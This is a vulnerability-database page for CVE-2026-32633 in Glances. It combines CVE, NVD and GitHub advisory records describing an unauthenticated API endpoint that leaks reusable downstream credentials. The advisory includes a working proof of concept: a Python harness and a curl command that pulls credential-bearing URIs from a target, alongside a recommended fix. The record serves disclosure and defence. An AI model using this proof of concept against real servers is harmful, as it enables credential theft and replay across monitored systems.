Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-32633 (GCVE-0-2026-32633)
Vulnerability from cvelistv5 – Published: 2026-03-18 17:53 – Updated: 2026-03-18 18:35| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/commit/879ef… | x_refsource_MISC |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32633",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-18T18:35:24.415863Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T18:35:27.562Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-522",
"description": "CWE-522: Insufficiently Protected Credentials",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T17:53:11.263Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m"
},
{
"name": "https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
}
],
"source": {
"advisory": "GHSA-r297-p3v4-wp8m",
"discovery": "UNKNOWN"
},
"title": "Glances\u0027s Browser API Exposes Reusable Downstream Credentials via `/api/4/serverslist`"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32633",
"datePublished": "2026-03-18T17:53:11.263Z",
"dateReserved": "2026-03-12T15:29:36.559Z",
"dateUpdated": "2026-03-18T18:35:27.562Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-32633",
"date": "2026-05-25",
"epss": "0.00103",
"percentile": "0.27593"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-32633\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-18T18:16:28.933\",\"lastModified\":\"2026-03-19T19:04:46.033\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":9.1,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-200\"},{\"lang\":\"en\",\"value\":\"CWE-522\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-522\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.5.2\",\"matchCriteriaId\":\"3FC19E01-80F1-43BB-912C-39FE99143A59\"}]}]}],\"references\":[{\"url\":\"https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nicolargo/glances/releases/tag/v4.5.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32633\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-18T18:35:24.415863Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-18T18:35:16.287Z\"}}], \"cna\": {\"title\": \"Glances\u0027s Browser API Exposes Reusable Downstream Credentials via `/api/4/serverslist`\", \"source\": {\"advisory\": \"GHSA-r297-p3v4-wp8m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.2\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e\", \"name\": \"https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.2\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-200\", \"description\": \"CWE-200: Exposure of Sensitive Information to an Unauthorized Actor\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-522\", \"description\": \"CWE-522: Insufficiently Protected Credentials\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-18T17:53:11.263Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-32633\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-18T18:35:27.562Z\", \"dateReserved\": \"2026-03-12T15:29:36.559Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-18T17:53:11.263Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-32633
Vulnerability from fkie_nvd - Published: 2026-03-18 18:16 - Updated: 2026-03-19 19:04{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59",
"versionEndExcluding": "4.5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Prior to version 4.5.2, in Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret. If the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance. Version 4.5.2 fixes the issue."
},
{
"lang": "es",
"value": "Glances es una herramienta de monitoreo de sistema de c\u00f3digo abierto multiplataforma. Antes de la versi\u00f3n 4.5.2, en modo Navegador Central, el endpoint `/api/4/serverslist` devuelve objetos de servidor sin procesar de `GlancesServersList.get_servers_list()`. Esos objetos son mutados in situ durante el sondeo en segundo plano y pueden contener un campo `uri` con credenciales HTTP Basic incrustadas para servidores Glances descendentes, utilizando el secreto de autenticaci\u00f3n de Glances derivado de pbkdf2 reutilizable. Si la instancia frontal de Navegador/API de Glances se inicia sin `--password`, lo cual es compatible y com\u00fan para implementaciones de red internas, `/api/4/serverslist` no est\u00e1 completamente autenticado. Cualquier usuario de red que pueda alcanzar la API del Navegador puede recuperar credenciales reutilizables para servidores Glances descendentes protegidos una vez que hayan sido sondeados por la instancia del navegador. La versi\u00f3n 4.5.2 corrige el problema."
}
],
"id": "CVE-2026-32633",
"lastModified": "2026-03-19T19:04:46.033",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-18T18:16:28.933",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
},
{
"lang": "en",
"value": "CWE-522"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-522"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
GHSA-R297-P3V4-WP8M
Vulnerability from github – Published: 2026-03-16 16:35 – Updated: 2026-03-18 21:48Summary
In Central Browser mode, the /api/4/serverslist endpoint returns raw server objects from GlancesServersList.get_servers_list(). Those objects are mutated in-place during background polling and can contain a uri field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret.
If the front Glances Browser/API instance is started without --password, which is supported and common for internal network deployments, /api/4/serverslist is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance.
Details
The Browser API route simply returns the raw servers list:
# glances/outputs/glances_restful_api.py:799-805
def _api_servers_list(self):
self.__update_servers_list()
return GlancesJSONResponse(self.servers_list.get_servers_list() if self.servers_list else [])
The main API router is only protected when the front instance itself was started with --password. Otherwise there are no authentication dependencies at all:
# glances/outputs/glances_restful_api.py:475-480
if self.args.password:
router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
router = APIRouter(prefix=self.url_prefix)
The Glances web server binds to 0.0.0.0 by default:
# glances/main.py:425-427
parser.add_argument(
'--bind',
default='0.0.0.0',
dest='bind_address',
)
During Central Browser polling, server entries are modified in-place and gain a uri field:
# glances/servers_list.py:141-148
def __update_stats(self, server):
server['uri'] = self.get_uri(server)
...
if server['protocol'].lower() == 'rpc':
self.__update_stats_rpc(server['uri'], server)
elif server['protocol'].lower() == 'rest' and not import_requests_error_tag:
self.__update_stats_rest(f"{server['uri']}/api/{__apiversion__}", server)
For protected servers, get_uri() loads the saved password from the [passwords] section (or the default password), hashes it, and embeds it directly in the URI:
# glances/servers_list.py:119-130
def get_uri(self, server):
if server['password'] != "":
if server['status'] == 'PROTECTED':
clear_password = self.password.get_password(server['name'])
if clear_password is not None:
server['password'] = self.password.get_hash(clear_password)
uri = 'http://{}:{}@{}:{}'.format(
server['username'],
server['password'],
server['name'],
server['port'],
)
else:
uri = 'http://{}:{}'.format(server['name'], server['port'])
return uri
Password lookup falls back to a global default:
# glances/password_list.py:55-58
try:
return self._password_dict[host]
except (KeyError, TypeError):
return self._password_dict['default']
The sample configuration explicitly supports browser-wide default password reuse:
# conf/glances.conf:656-663
[passwords]
# localhost=abc
# default=defaultpassword
The secret embedded in uri is not the cleartext password, but it is still a reusable Glances authentication credential. Client connections send that pbkdf2-derived hash over HTTP Basic authentication:
# glances/password.py:72-74,94
# For Glances client, get the password (confirm=False, clear=True):
# 2) the password is hashed with SHA-pbkdf2_hmac (only SHA string transit
password = password_hash
# glances/client.py:56-57
if args.password != "":
self.uri = f'http://{args.username}:{args.password}@{args.client}:{args.port}'
The Browser WebUI also consumes that raw uri directly and redirects the user to it:
// glances/outputs/static/js/Browser.vue:83-103
fetch("api/4/serverslist", { method: "GET" })
...
window.location.href = server.uri;
So once server.uri contains credentials, those credentials are not just used internally; they are exposed to API consumers and frontend JavaScript.
PoC
Step 1: Verified local live proof that server objects contain credential-bearing URIs
The following command executes the real glances/servers_list.py update logic against a live local HTTP server that always returns 401. This forces Glances to mark the downstream server as PROTECTED and then retry with the saved/default password. After the second refresh, the in-memory server list contains a uri field with embedded credentials.
cd D:\bugcrowd\glances\repo
@'
import importlib.util
import json
import sys
import threading
import types
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from defusedxml import xmlrpc as defused_xmlrpc
pkg = types.ModuleType('glances')
pkg.__apiversion__ = '4'
sys.modules['glances'] = pkg
client_mod = types.ModuleType('glances.client')
class GlancesClientTransport(defused_xmlrpc.xmlrpc_client.Transport):
def set_timeout(self, timeout):
self.timeout = timeout
client_mod.GlancesClientTransport = GlancesClientTransport
sys.modules['glances.client'] = client_mod
globals_mod = types.ModuleType('glances.globals')
globals_mod.json_loads = json.loads
sys.modules['glances.globals'] = globals_mod
logger_mod = types.ModuleType('glances.logger')
logger_mod.logger = types.SimpleNamespace(
debug=lambda *a, **k: None,
warning=lambda *a, **k: None,
info=lambda *a, **k: None,
error=lambda *a, **k: None,
)
sys.modules['glances.logger'] = logger_mod
password_list_mod = types.ModuleType('glances.password_list')
class GlancesPasswordList: pass
password_list_mod.GlancesPasswordList = GlancesPasswordList
sys.modules['glances.password_list'] = password_list_mod
dynamic_mod = types.ModuleType('glances.servers_list_dynamic')
class GlancesAutoDiscoverServer: pass
dynamic_mod.GlancesAutoDiscoverServer = GlancesAutoDiscoverServer
sys.modules['glances.servers_list_dynamic'] = dynamic_mod
static_mod = types.ModuleType('glances.servers_list_static')
class GlancesStaticServer: pass
static_mod.GlancesStaticServer = GlancesStaticServer
sys.modules['glances.servers_list_static'] = static_mod
spec = importlib.util.spec_from_file_location('tested_servers_list', Path('glances/servers_list.py'))
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
GlancesServersList = mod.GlancesServersList
class Handler(BaseHTTPRequestHandler):
def do_POST(self):
_ = self.rfile.read(int(self.headers.get('Content-Length', '0')))
self.send_response(401)
self.end_headers()
def log_message(self, *args):
pass
httpd = HTTPServer(('127.0.0.1', 0), Handler)
port = httpd.server_address[1]
thread = threading.Thread(target=httpd.serve_forever, daemon=True)
thread.start()
class FakePassword:
def get_password(self, host=None):
return 'defaultpassword'
def get_hash(self, password):
return f'hash({password})'
sl = GlancesServersList.__new__(GlancesServersList)
sl.password = FakePassword()
sl._columns = [{'plugin': 'system', 'field': 'hr_name'}]
server = {
'key': f'target:{port}',
'name': '127.0.0.1',
'ip': '203.0.113.77',
'port': port,
'protocol': 'rpc',
'username': 'glances',
'password': '',
'status': 'UNKNOWN',
'type': 'STATIC',
}
sl.get_servers_list = lambda: [server]
sl._GlancesServersList__update_stats(server)
sl._GlancesServersList__update_stats(server)
httpd.shutdown()
thread.join(timeout=2)
print(json.dumps(sl.get_servers_list(), indent=2))
'@ | python -
Verified output:
[
{
"key": "target:57390",
"name": "127.0.0.1",
"ip": "203.0.113.77",
"port": 57390,
"protocol": "rpc",
"username": "glances",
"password": null,
"status": "PROTECTED",
"type": "STATIC",
"uri": "http://glances:hash(defaultpassword)@127.0.0.1:57390",
"columns": [
"system_hr_name"
]
}
]
This is the same raw object shape that /api/4/serverslist returns.
Step 2: Remote reproduction on a live Browser instance
- Configure Glances Browser mode with a saved default password for downstream servers:
[passwords]
default=SuperSecretBrowserPassword
- Start the Browser/API instance without front-end authentication:
glances --browser -w -C ./glances.conf
-
Ensure at least one protected downstream server is polled and marked
PROTECTED. -
From any machine that can reach the Glances Browser API, fetch the raw server list:
curl -s http://TARGET:61208/api/4/serverslist
- Observe entries like:
{
"name": "internal-glances.example",
"status": "PROTECTED",
"uri": "http://glances:<pbkdf2_hash>@internal-glances.example:61209"
}
Impact
- Unauthenticated credential disclosure: When the front Browser API runs without
--password, any reachable user can retrieve downstream Glances authentication secrets from/api/4/serverslist. - Credential replay: The disclosed pbkdf2-derived hash is the effective Glances client secret and can be replayed against downstream Glances servers using the same password.
- Fleet-wide blast radius: A single Browser instance can hold passwords for many downstream servers via host-specific entries or
[passwords] default, so one exposed API can disclose credentials for an entire monitored fleet. - Chains with the earlier CORS issue: Even when the front instance uses
--password, the permissive default CORS behavior can let a malicious website read/api/4/serverslistfrom an authenticated browser session and steal the same downstream credentials cross-origin.
Recommended Fix
Do not expose credential-bearing fields in API responses. At minimum, strip uri, password, and any derived credential material from /api/4/serverslist responses and make the frontend derive navigation targets without embedded auth.
# glances/outputs/glances_restful_api.py
def _sanitize_server(self, server):
safe = dict(server)
safe.pop('password', None)
safe.pop('uri', None)
return safe
def _api_servers_list(self):
self.__update_servers_list()
servers = self.servers_list.get_servers_list() if self.servers_list else []
return GlancesJSONResponse([self._sanitize_server(server) for server in servers])
And in the Browser WebUI, construct navigation URLs from non-secret fields (ip, name, port, protocol) instead of trusting a backend-supplied server.uri.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.5.2-dev01"
},
"package": {
"ecosystem": "PyPI",
"name": "Glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32633"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-522"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-16T16:35:01Z",
"nvd_published_at": "2026-03-18T18:16:28Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nIn Central Browser mode, the `/api/4/serverslist` endpoint returns raw server objects from `GlancesServersList.get_servers_list()`. Those objects are mutated in-place during background polling and can contain a `uri` field with embedded HTTP Basic credentials for downstream Glances servers, using the reusable pbkdf2-derived Glances authentication secret.\n\nIf the front Glances Browser/API instance is started without `--password`, which is supported and common for internal network deployments, `/api/4/serverslist` is completely unauthenticated. Any network user who can reach the Browser API can retrieve reusable credentials for protected downstream Glances servers once they have been polled by the browser instance.\n\n## Details\n\nThe Browser API route simply returns the raw servers list:\n\n```python\n# glances/outputs/glances_restful_api.py:799-805\ndef _api_servers_list(self):\n self.__update_servers_list()\n return GlancesJSONResponse(self.servers_list.get_servers_list() if self.servers_list else [])\n```\n\nThe main API router is only protected when the front instance itself was started with `--password`. Otherwise there are no authentication dependencies at all:\n\n```python\n# glances/outputs/glances_restful_api.py:475-480\nif self.args.password:\n router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])\nelse:\n router = APIRouter(prefix=self.url_prefix)\n```\n\nThe Glances web server binds to `0.0.0.0` by default:\n\n```python\n# glances/main.py:425-427\nparser.add_argument(\n \u0027--bind\u0027,\n default=\u00270.0.0.0\u0027,\n dest=\u0027bind_address\u0027,\n)\n```\n\nDuring Central Browser polling, server entries are modified in-place and gain a `uri` field:\n\n```python\n# glances/servers_list.py:141-148\ndef __update_stats(self, server):\n server[\u0027uri\u0027] = self.get_uri(server)\n ...\n if server[\u0027protocol\u0027].lower() == \u0027rpc\u0027:\n self.__update_stats_rpc(server[\u0027uri\u0027], server)\n elif server[\u0027protocol\u0027].lower() == \u0027rest\u0027 and not import_requests_error_tag:\n self.__update_stats_rest(f\"{server[\u0027uri\u0027]}/api/{__apiversion__}\", server)\n```\n\nFor protected servers, `get_uri()` loads the saved password from the `[passwords]` section (or the `default` password), hashes it, and embeds it directly in the URI:\n\n```python\n# glances/servers_list.py:119-130\ndef get_uri(self, server):\n if server[\u0027password\u0027] != \"\":\n if server[\u0027status\u0027] == \u0027PROTECTED\u0027:\n clear_password = self.password.get_password(server[\u0027name\u0027])\n if clear_password is not None:\n server[\u0027password\u0027] = self.password.get_hash(clear_password)\n uri = \u0027http://{}:{}@{}:{}\u0027.format(\n server[\u0027username\u0027],\n server[\u0027password\u0027],\n server[\u0027name\u0027],\n server[\u0027port\u0027],\n )\n else:\n uri = \u0027http://{}:{}\u0027.format(server[\u0027name\u0027], server[\u0027port\u0027])\n return uri\n```\n\nPassword lookup falls back to a global default:\n\n```python\n# glances/password_list.py:55-58\ntry:\n return self._password_dict[host]\nexcept (KeyError, TypeError):\n return self._password_dict[\u0027default\u0027]\n```\n\nThe sample configuration explicitly supports browser-wide default password reuse:\n\n```ini\n# conf/glances.conf:656-663\n[passwords]\n# localhost=abc\n# default=defaultpassword\n```\n\nThe secret embedded in `uri` is not the cleartext password, but it is still a reusable Glances authentication credential. Client connections send that pbkdf2-derived hash over HTTP Basic authentication:\n\n```python\n# glances/password.py:72-74,94\n# For Glances client, get the password (confirm=False, clear=True):\n# 2) the password is hashed with SHA-pbkdf2_hmac (only SHA string transit\npassword = password_hash\n```\n\n```python\n# glances/client.py:56-57\nif args.password != \"\":\n self.uri = f\u0027http://{args.username}:{args.password}@{args.client}:{args.port}\u0027\n```\n\nThe Browser WebUI also consumes that raw `uri` directly and redirects the user to it:\n\n```javascript\n// glances/outputs/static/js/Browser.vue:83-103\nfetch(\"api/4/serverslist\", { method: \"GET\" })\n...\nwindow.location.href = server.uri;\n```\n\nSo once `server.uri` contains credentials, those credentials are not just used internally; they are exposed to API consumers and frontend JavaScript.\n\n## PoC\n\n### Step 1: Verified local live proof that server objects contain credential-bearing URIs\n\nThe following command executes the real `glances/servers_list.py` update logic against a live local HTTP server that always returns `401`. This forces Glances to mark the downstream server as `PROTECTED` and then retry with the saved/default password. After the second refresh, the in-memory server list contains a `uri` field with embedded credentials.\n\n```bash\ncd D:\\bugcrowd\\glances\\repo\n@\u0027\nimport importlib.util\nimport json\nimport sys\nimport threading\nimport types\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom pathlib import Path\nfrom defusedxml import xmlrpc as defused_xmlrpc\n\npkg = types.ModuleType(\u0027glances\u0027)\npkg.__apiversion__ = \u00274\u0027\nsys.modules[\u0027glances\u0027] = pkg\n\nclient_mod = types.ModuleType(\u0027glances.client\u0027)\nclass GlancesClientTransport(defused_xmlrpc.xmlrpc_client.Transport):\n def set_timeout(self, timeout):\n self.timeout = timeout\nclient_mod.GlancesClientTransport = GlancesClientTransport\nsys.modules[\u0027glances.client\u0027] = client_mod\n\nglobals_mod = types.ModuleType(\u0027glances.globals\u0027)\nglobals_mod.json_loads = json.loads\nsys.modules[\u0027glances.globals\u0027] = globals_mod\n\nlogger_mod = types.ModuleType(\u0027glances.logger\u0027)\nlogger_mod.logger = types.SimpleNamespace(\n debug=lambda *a, **k: None,\n warning=lambda *a, **k: None,\n info=lambda *a, **k: None,\n error=lambda *a, **k: None,\n)\nsys.modules[\u0027glances.logger\u0027] = logger_mod\n\npassword_list_mod = types.ModuleType(\u0027glances.password_list\u0027)\nclass GlancesPasswordList: pass\npassword_list_mod.GlancesPasswordList = GlancesPasswordList\nsys.modules[\u0027glances.password_list\u0027] = password_list_mod\n\ndynamic_mod = types.ModuleType(\u0027glances.servers_list_dynamic\u0027)\nclass GlancesAutoDiscoverServer: pass\ndynamic_mod.GlancesAutoDiscoverServer = GlancesAutoDiscoverServer\nsys.modules[\u0027glances.servers_list_dynamic\u0027] = dynamic_mod\n\nstatic_mod = types.ModuleType(\u0027glances.servers_list_static\u0027)\nclass GlancesStaticServer: pass\nstatic_mod.GlancesStaticServer = GlancesStaticServer\nsys.modules[\u0027glances.servers_list_static\u0027] = static_mod\n\nspec = importlib.util.spec_from_file_location(\u0027tested_servers_list\u0027, Path(\u0027glances/servers_list.py\u0027))\nmod = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(mod)\nGlancesServersList = mod.GlancesServersList\n\nclass Handler(BaseHTTPRequestHandler):\n def do_POST(self):\n _ = self.rfile.read(int(self.headers.get(\u0027Content-Length\u0027, \u00270\u0027)))\n self.send_response(401)\n self.end_headers()\n def log_message(self, *args):\n pass\n\nhttpd = HTTPServer((\u0027127.0.0.1\u0027, 0), Handler)\nport = httpd.server_address[1]\nthread = threading.Thread(target=httpd.serve_forever, daemon=True)\nthread.start()\n\nclass FakePassword:\n def get_password(self, host=None):\n return 